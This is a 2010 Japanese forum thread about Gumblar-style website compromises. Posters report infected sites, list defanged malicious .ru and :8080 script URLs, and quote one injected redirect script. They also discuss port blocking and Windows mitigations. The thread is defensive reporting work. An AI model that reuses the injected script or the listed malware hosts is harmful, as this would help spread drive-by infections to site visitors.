ttp://i45.tinypic.com/21j2340.jpg

filelist.us
US留め

ハードディスクに保存したwebページを開いたら

「Adobe Flash Playerは潜在的に危険な操作を停止しました。
お客様のコンピューターまたはネットワークで次のローカルアプリケーション
（ここに保存したwebページのローカルアドレスが入ってます）
はインターネット接続が有効になっている次の場所と通信しようとしています
ai.yimg.jp
このアプリケーションがインターネット通信できるようにするには、
「設定」をクリックしてください。
設定の変更後アプリケーションを再起動する必要があります」

というダイアログが出てきます、これはweb改竄ウイルスでしょうか？
怖いので何もいじくってません

ちなみにＮＩＳ２０１０は無反応でした

違います

ai.yimg.jpはyahooのAdServerだよ

>>910-911
違うんですね、よかった・・・
お答えありがとうございました

>>905
修正したみたい。＞楽

>>906
「その問題はとうの昔に起きていますよ」
というご指摘をされてるんだなと解釈してたんですが…
なんか的外れな事を言ってる気がしてきましたorz

>>913
チェック乙です
精査まではしてませんけど、aguseで見た限りは大丈夫そうですね

http://www.forest.impress.co.jp/docs/news/20100706_378898.html

トレンドマイクロwwww

>>913
ぜんぜんだめでした
恐ろしい量の.ru/js.jsが仕込まれてます…

>>908のは例のFlashの設定にある自動的にP2P云々の奴だな
心配なら設定ページで開かないようにすればいい

ブラウザが外部の80と443に接続できるよう許可を与え
8080に接続できないようにPFWで設定しておけば良いのですか？

>>917
あれれ、
「00_css/default.asp」以外にもあるのか。。。
「.ru/js.js」があったときのソース。（注意：アンチウイルスがソースに反応する場合があります。）
http://megalodon.jp/2010-0705-0530-51/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.lalacha.com%2F00_css%2Fdefault.asp
いま、撮ったソース。
http://megalodon.jp/2010-0706-2009-42/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.lalacha.com%2F00_css%2Fdefault.asp

まずこのスレきたら
>>2を見てURLチェッカーでURL調査しようね＾−＾

>>920っと。
>>917
見つけました。
そこだけ削除したんか。。。
もいちどメル逝ってきまつ。。。

って>>922
別のアドのads.jsになってた。。。

http://megalodon.jp/2010-0706-2027-14/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Elalacha%2Ecom%2Finfo%2Fstockdiarylist%2Easp

楽々茶はSQLインジェクションだから
データベースを修正すれば全部解決
またやられれば、あちこちにまた挿入…ってことになりますね

ちょっと早いけど次スレ
http://pc11.2ch.net/test/read.cgi/sec/1278430098

テンプラは改竄されなかったけｄ(ry

>>917
メルすたお。

>>924
なんですとぉー。。。
>>905でこちらでもcom:8080へ逝ったの確認すたのでしが。。。orz......

>>926
×com:8080へ逝った
○109●196●134●58/ssl●htmlまで逝けてcom:8080へ飛ばそうしてた
com:8080は蹴られたん。

>>919
それで問題ないし感染を防げる

こんな下らんものに感染するのは素人だけ
買ってきたパソコンをそのまま使ってるカス

本当にIDが出ないのをいいことにPC捨てればだのカスだの余計な一言が多いなこのスレ
常に相手を見下して優越感に浸ってないと気が済まない人種なんだろうか……

あと>>925乙

スレの存在意義あるよね、初心者の手助けになってるし＾−＾

Gumblarってそんなに流行してる？周囲みても引っ掛かった人いないよ・・・・・
最近はルーターとかウイルスソフト入れて対策してるから大丈夫のようです

ここは感染防止のスレじゃないですからねー（汗）
感染してる人を見つけて報告するのが目的ですし
今まで通り仲良くやりましょうよ

>>925乙

>>929
ブラウザが外部の80と443に接続できるよう許可を与え
8080に接続できないようにPFWで設定しておけば良いのですか？

Browser Guard 2010
http://www.gigafree.net/security/antivirus/browserguard.html

イラネ(ﾟдﾟ)

【悪用厳禁】
www●infini+ypm●jp/shale52●html
　　　→<scr ipt>location = 'h++p://thesuperviagra●com/';</scr ipt>

バリュードメイン…orz

>>919
>>928
8080はウィルス作者が仮につけたもんだから、
今後81とか444とか勝手に変わるかも知れない

現状、確かにそれで感染しにくくはなるが
それは完璧な対応ではない

こういう過信してる奴こそ危ない


初期ガンブラーはtcp80そのものじゃなかったっけ？

>>937
どういった対策を取っているの？
ＡＶＧとかカスペで定期的にスキャンしてれば良いですか？

いちばんの対策は、WinVista/7を使って、非管理者の一般ユーザー権限でログインしてWeb閲覧、
ブラウザは、IE8(保護モードオン)もしくはChrome
これでしょ？

OS/ブラウザレベルで0-dayでもやられなくしたうえで、さらにウイルス対策ソフトで念のために防御

ウイルス対策ソフトなんだが
今まで２ｃｈのログファイルの中のコードが反応したくらいで
後は何も検出されたことないな・・・
何もないので逆に不安になるｗｗｗ

eicar.com踏んでみたり、メールで自分宛に送ってみたりすれば？

あ、eicar.comはテストしたことあるよ
それには反応した

言うの忘れてた・・・ｽﾏｿ

hobby-channel●net

さっきここ開いたら
「ヘルプとサポートセンター」が開いて
よく分からないプログラムのような文字列が表示された。
>>865に書かれてる最新Gumblarかな？

>>943
Vista以降でも脆弱性がないだけで「ヘルプとサポートセンター」は開くってこと？
XPならこの脆弱性だけでもシステムいじられるみたいだからマズイよなあ
ttp://www.smilebanana.com/archives/2010/06/29-2302.php

mail●hobby-channel●net/item-review/6359-6359●html

昨夜、上のアドレスを開いたら

MSIE Java Deployment Toolkit Input Invalidation
MSIE ADODB.Stream Object File Installation Weakness

の2個が
侵入の試みを遮断しました。と出ました

完全スキャンもしたんですが、何も出ませんでした。

XP ノートンです。

>>944
自分はXPでIE6を使ってます。

で、そのサイトを踏んだら
「ヘルプとサポートセンター」が開きそこにプログラムのような文字列が表示されました。
（そのまま開きっぱなしでその後の変化何も無し）

その後、複数社オンラインスキャンしましたが何も見つかりませんし
Gumblar/GENOのまとめサイトも見て色々探してみましたが怪しいものは何もありません。

それに944さんが教えてくれたサイトを見ると
『「ヘルプとサポートセンター」の画面が表示されてすぐに消え、同時にJavaのアイコンがタスクバーに現れる』
とのことなので、もしかしてギリギリ感染していないのでは？
とちょっと思いました。

でも全く同じ状況ではないですしもう少し調べてみようと思います。
（最悪の場合リカバリした方がよいかな、とも考えています）
ありがとうございました。

JRE 6u21が来てるみたいだが
セキュリティに関するアップデートはないようだ

いつになったらこのウイルスから解放されるの？
つーか何故誰もこの改竄やってるバカを捕まえないんだ？
他のウイルス作者はガンガン捕まってるというのに…
これだけ就活とか会社の営業に悪影響を与えているんだから
国レベルで捕まえるのが普通だろうに

>>948
> いつになったらこのウイルスから解放されるの？
このウイルスが収束しても似たのが出てくる
実際いまはすでに亜種いろいろ

> つーか何故誰もこの改竄やってるバカを捕まえないんだ？
亜種も含めてたくさんいます

> 他のウイルス作者はガンガン捕まってるというのに…
そうでもないだろ

> これだけ就活とか会社の営業に悪影響を与えているんだから
> 国レベルで捕まえるのが普通だろうに
国レベルで捕まえるって例えばどんなふうにやるの？
就活は個人の問題
会社もPC管理がおろそかなとこが問題になってるだけ

>>948
去年の12月23日ころくらいから新型が話題になったんだっけ？
そのときアドビがもっとしっかりと対応していれば・・・

あんまり変わらなかったのかも知れないけど

http://hobby-channel.net/notice/50-hcspecial/19341-19341.html
> 弊社サイトのウイルス感染に関するお詫びとお願い

　　　　　＿人人人人人人人人人人人人人人人＿
　　　　　＞　　　　　わりとどうでもいい　　　　　 ＜
　　　　　￣^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^^Ｙ^￣

　　　　　　　　　　　　　　　ヘ(^o^)ヘ　
　　　　　　　　　　　　　　　　　 |∧　　　
　　　　　　　　　　　　　　　　　/

うちのサーバはFTPログインできるのはホームページ管理会社のIPアドレスのみ
＆契約時の条件にウイルス対策ソフトウェアいれて最新に更新したPCから更新することっていれてるぞ

つい最近ヘルプとサポセンの脆弱性出たよな

>>954
ヘルプの脆弱性のやつはウィンドウズアップデートではなくて、
MSの用意したHPから適用をして、対応するんだっけ？

今のところはね。レジストリでhcp潰す奴(FixItも同じ)。
今月パッチ配布予定。

Microsoft、7月の月例更新は3件の「緊急」の脆弱性に対応

Microsoft は今回、最近見つかった2つのゼロデイ脆弱性のための
修正パッチをリリースしようとしている。
Googleのエンジニアが先週公開した
ゼロデイ脆弱性の1つは、『Microsoft Windows Help and Support Center』の
機能の欠陥

対応なしは
1.今週初めに匿名のハッカーグループが公表したもう1つのゼロデイ脆弱性に今回対応しない予定

2.
6日にユーザーおよびシステム管理者に対して警告を行なった
開発者向けの重要なクラスライブラリ『Microsoft Foundation Class』(MFC) に存在する
セキュリティホールについても今回対応しない予定

なお、Microsoftはこの日をもって、Windows 2000とWindows XP SP2(32bitのみ)のサポートを打ち切る。
以後、たとえ深刻な問題が見つかったとしても、解決のための更新プログラムは提供しない。

http://pc11.2ch.net/test/read.cgi/sec/1276671434/805-806n
アラビア文字っぽい

>>958
確認しました
凸っておきます

【陥落サイトのURL悪用厳禁】
www●prjapan●com/ ←どうやったらこうなる？

静的なhtmlではなく、いろんなデータベースやファイルから拾って生成する
動的なページにはよくあること。
www●prjapan●com/xmlrpc.php
なんてのまでやられてる。

やっと通った…

gopakgyo●playmateswcc●com:8080/CAD●js
　　→gopakgyo●playmateswcc●com:8080/index●php_Gk…
　　　　→<div name="Ndo251m5n" id="Ndo251m5n">103R100R38R38…

http://www.virustotal.com/analisis/2c338972f6a08ae0b9945b1a00e76025101208c8912be63cc79742294684666a-1278839935
Result: 1/41 (2.44%) … Troj/ObfJS-X

怖くてこれ以上先に行けなかったけど、例の脆弱性狙いかな
Avira、Avast、Kasperskyに検体提出

hinano●net　：Forbidden
prjapan●com　：スクリプト消去/告知なし
www●lalacha●com/product/productList●asp?kindid=4　：found「.ru/js.js」
www●infinitypm●jp/shale52●html　：生存/跳び先変更/デジロぇ…

取扱注意
www●keiunkaku●com
ドットコム：8080恐ろしいです＞＜；

今流行りらしいミューズの音が流れるウイルスは
このweb改変しているウイルスとは全然違うものでしょうか？

はい

申し訳ありませんでした。

はい

www●keiunkaku●com　：駆除を確認

www●lalacha●com　：再改竄を確認/頑張りすぎorz
> 検出数 URL
> 612 peer●webserviceaan●ru/js●js
> 177 www●lalacha●com/01_js/function●js
> 158 go●postfolkovs●ru/js●js
> 123 sslput●postfolkovs●ru/js●js
> 93 vba●postfolkovs●ru/js●js
> 90 frame●webservicesttt●ru/js●js
> 64 base●webserviceftp●ru/js●js
> 55 ole●webservicesbba●ru/js●js
> 54 confirm●postfolkovs●ru/js●js
> 54 ntio●webservicelupa●ru/js●js
> 27 www●ads-t●ru/ads●js

相模女子大が感染してるのもこれですかね？

大学のサイトならとりあえずこのウィルスに限らず至急電凸orメル凸すべし

大学のサイトなんて他のサイトと比べてアクセスされる回数は多いんだから

内部向けのとこだし対処する告知あるからいいかと思って・・・

内部向けのサイトなら外から確認できないだろ

chibi●9981●ne●jp/psd/

lacinquieme●s7●xrea●com

いつも使っている有名なあるサイトで、
新しいコンテンツがあったので登録しようとしたら、
別のページへ飛ぶんだけど、その時に火狐のCookieの許可画面で〜.jp:8080て表示が出たが、
これは怪しいサイト？
aguseで元リンクからとか探ったけど、反応は出なかった

別に8080ポートが全部怪しいわけじゃないし。
ここは鑑定スレじゃないので、その辺を
自分で判断できないなら他行ってくれ。

>>976
URL貼れよ

www●realworld●jp/game
の「今すぐはじめる」をクリックした次の同意ページで、
同意を選ぶと出るクッキー可否が8080表示ですが・・・
同意ページはどのゲームでも8080クッキーが出ます

でも8080は全部遮断するくらいが精神衛生に良いと思うよ

18日時点の8080なら、>>4をすべて網羅して
あれば問題なしと思われる

www●interiorshop-bigjoy●jp/

取扱注意
www●hoshino-jimusho●co●jp
minimini-east●jp
ミニミニで部屋借りるのやめとこ…

取扱注意
saitama●rl-toyota●co●jp
www●career-engine●jp
www●kaitori-bancho●com

トヨタレンタリース埼玉ｗｗｗ

>>983
暇なので電凸
＞minimini-east●jp
別の方より連絡済
調査会社に依頼した結果感染の事実なしの連絡ありだそうです
私から説明して置きました
＞www●hoshino-jimusho●co●jp
他の方から感染の話しがないので
私を警察に訴えるとの事
上等ですw
警視庁ハイテク課、赤坂署の確認した所、連絡が有った事実は確認されず
警視庁ハイテク課から＞www●hoshino-jimusho●co●jpに連絡して貰う様約束
魚拓
http://megalodon.jp/2010-0720-1730-26/www.hoshino-jimusho.co.jp/
aguse
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.hoshino-jimusho.co.jp%2F&x=13&y=13

お、乙です・・・

怒るだけならともかく（それもアレだけど）、どいつもこいつも「訴える」ってどんな神経かね？
マニュアルでもあるのか

> 他の方から感染の話しがないので
> 私を警察に訴えるとの事

( ﾟдﾟ)ﾎﾟｶｰﾝ ( ﾟдﾟ)ﾎﾟｶｰﾝ ( ﾟдﾟ)ﾎﾟｶｰﾝ ( ﾟдﾟ)ﾎﾟｶｰﾝ

minimini-eastはコードが見当たらない
直したのか、勘違いしたのか…

>>985 > hoshino-jimusho
支援
reginaにもメルポ。

8080が使ってくるかもしれんので投下しておく

【ゼロデイ攻撃】Windowsの脆弱性狙うトロイの木馬〜MSがアドバイザリ公開
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2296

マイクロソフト セキュリティ アドバイザリ (2286198)
Windows シェルの脆弱性により、リモートでコードが実行される
ttp://www.microsoft.com/japan/technet/security/advisory/2286198.mspx

WebClient無効は必須やね。

何か前も訴えるとか言ってきた奴いたよなぁ

>>991
WebDAV(WebClient)無効はあくまでWebDAV使った攻撃を潰せるだけで、
ネットワークドライブとかUSBメモリとかには無力です。
他の既知の脆弱性を組み合わせてexeとセットで
ローカルに落とし込むドロッパもありえます。
必須なのはWebDAVよりもlnkアイコンを潰すことです。
regeditでめんどいしデスクトップがダサくなるけど。

>>989
書き込みされた時点ではaguseで出たから
こっそり修正→感染の事実無し
という流れだろうなぁ…

日刊スポーツのトップで常駐が反応した

PC WatchのトップでAVGに怒られた

AVGだけみたいだから誤検出臭い…すまん

取扱注意
www●kakiyasuhonten●co●jp

store●nextbusinesssystem●com
www●kidsdrink●jp

死ね

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。